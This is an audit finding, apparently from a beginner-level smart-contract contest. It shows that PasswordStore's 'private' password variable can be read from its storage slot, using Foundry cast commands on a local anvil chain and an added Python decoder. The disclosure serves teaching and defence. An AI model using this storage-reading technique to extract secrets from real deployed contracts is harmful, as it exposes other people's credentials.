Beginner Friendly, Foundry
Submission Details
Severity: high
Valid

The `s_password` state variable's value can be read directly from its storage slot.

Summary

Never store passwords on-chain: state variable values are readable directly from the contract's storage slots, regardless of whether the variable's visibility is set to private.

Vulnerability Details

string private s_password;

PasswordStore.sol - Line 14

The s_password state variable's visibility is set to private on the assumption that its value won't be visible to other users. In Solidity, private does not prevent the value from being read; it only stops other contracts (including derived contracts) from accessing the variable through Solidity code. Anyone off-chain can read the raw value from the contract's storage slot with an ordinary RPC call.

POC

Follow the steps:

  1. Run the local anvil node using the command make anvil.

  2. Deploy the smart contract on the local anvil chain using the command make deploy. This will deploy the PasswordStore smart contract and set the new password.

  3. Grab the deployed smart contract address from the terminal where you deployed the smart contract. In my case it is 0x5FbDB2315678afecb367f032d93F642f64180aa3.

  4. Read the storage value of the deployed smart contract using Foundry's cast command: cast storage <contract-address> <storage-slot>. In my case it is cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 1 (slot 1, because the owner address is stored in slot 0 and the password in slot 1).

  5. Result: 0x6d7950617373776f726400000000000000000000000000000000000000000014 (string value in bytes form).

  6. Convert back to string form using the command cast parse-bytes32-string <bytes value>. In my case it is cast parse-bytes32-string "0x6d7950617373776f726400000000000000000000000000000000000000000014".

  7. Result: "myPassword"

We have seen that anyone can read the values of a smart contract's private state variables from its storage slots.
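As an added example (not part of this submission or the PasswordStore project), the following Python decodes the raw 32-byte storage words that cast storage returns, reproducing what cast parse-bytes32-string does in step 6, and shows the slot layout the POC relies on. It assumes slot 0 holds the owner address and slot 1 the password, as stated above; the owner address in the sample is a constructed placeholder, while the slot 1 word is the exact value shown in the POC.

```python
# Added example, not part of the submission: decode the raw 32-byte storage
# words that `cast storage` returns for PasswordStore, the same decoding that
# `cast parse-bytes32-string` performs in step 6 of the POC.
# Assumed layout (as the POC states): slot 0 = owner address, slot 1 = s_password.

def decode_address_slot(word: str) -> str:
    """An address occupies the low 20 bytes of its slot (hex, no checksum)."""
    raw = bytes.fromhex(word.removeprefix("0x").zfill(64))
    return "0x" + raw[12:].hex()

def decode_string_slot(word: str) -> dict:
    """Decode a Solidity `string` storage word.

    Short strings (< 32 bytes) live in the slot itself: bytes left-aligned,
    lowest byte = length * 2 (even). Long strings keep length * 2 + 1 (odd)
    in the slot and the bytes at keccak256(slot), so from this one word only
    the length is recoverable and further reads are needed for the data.
    """
    raw = bytes.fromhex(word.removeprefix("0x").zfill(64))
    if len(raw) != 32:
        raise ValueError("expected a 32-byte storage word")
    marker = raw[31]
    if marker % 2 == 0:  # short string, stored in place
        length = marker // 2
        if length > 31:
            raise ValueError("invalid short-string length byte")
        return {"short": True, "length": length,
                "value": raw[:length].decode("utf-8", errors="replace")}
    length = (int.from_bytes(raw, "big") - 1) // 2  # long string: length only
    return {"short": False, "length": length, "value": None}

def encode_short_string(s: str) -> str:
    """Inverse of the short-string case: what the slot looks like on-chain."""
    data = s.encode("utf-8")
    if len(data) > 31:
        raise ValueError("only short strings (< 32 bytes) fit in one slot")
    return "0x" + (data + b"\x00" * (31 - len(data)) + bytes([len(data) * 2])).hex()

# Constructed sample storage: slot 1 is the exact word shown in the POC;
# slot 0 is a placeholder owner address, not a value from the page.
SAMPLE_STORAGE = {
    0: "0x0000000000000000000000001234567890abcdef1234567890abcdef12345678",
    1: "0x6d7950617373776f726400000000000000000000000000000000000000000014",
}

def recover_password(storage: dict) -> str:
    """What any off-chain reader can do: `private` is not enforced here."""
    return decode_string_slot(storage[1])["value"]

if __name__ == "__main__":
    print("owner   :", decode_address_slot(SAMPLE_STORAGE[0]))
    print("password:", recover_password(SAMPLE_STORAGE))  # myPassword
```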

Impact

The attacker will have access to the password, which can be used to exploit areas where the owner utilizes this password. Based on the user's password pattern, the attacker can also predict passwords for the owner's other platforms.

Tools Used

Manual Review

Recommendations

Never store passwords on-chain.

Updates

Lead Judging Commences

inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential.
